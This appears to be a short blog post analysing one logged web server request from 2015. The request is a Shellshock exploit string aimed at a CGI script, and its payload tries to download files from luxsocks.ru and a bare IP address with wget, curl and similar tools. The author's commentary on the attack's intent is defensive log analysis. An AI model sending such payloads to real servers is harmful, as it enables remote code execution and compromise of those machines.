186.56.42.11 - - [25/Apr/2015:09:11:48 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 477 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http//luxsocks.ru ; wget https://luxsocks.ru --no-check-certificate ; curl http//luxsocks.ru// ; curl -k https://luxsocks.ru ; lwp-download http://luxsocks.ru ; GET http://luxsocks.ru ; lynx http://luxsocks.ru ; wget http://174.122.42.230/luxx ; curl http://174.122.42.230/luxx ; fetch http://174.122.42.230/luxx ; lwp-download http://174.122.42.230/luxx ; GET http://174.122.42.230/luxx ; lynx http://174.122.42.230/luxx\");'"By using the commands above ( wget https://luxsocks.ru --no-check-certificate) it seems that the idea behind this attack was to download and replace the index.html page. So just for the record, if you have a index.html page already within the download directory, wget will simple put a index.html.1 page there. When you only have a index.php, this attack maybe could work, but seems to be odd.
The system was again hit for 30 times within a short time range. So even it would worked, it would result in 30 index.html files.
When testing the link against virustotal, there was no result
Keine Kommentare:
Kommentar veröffentlichen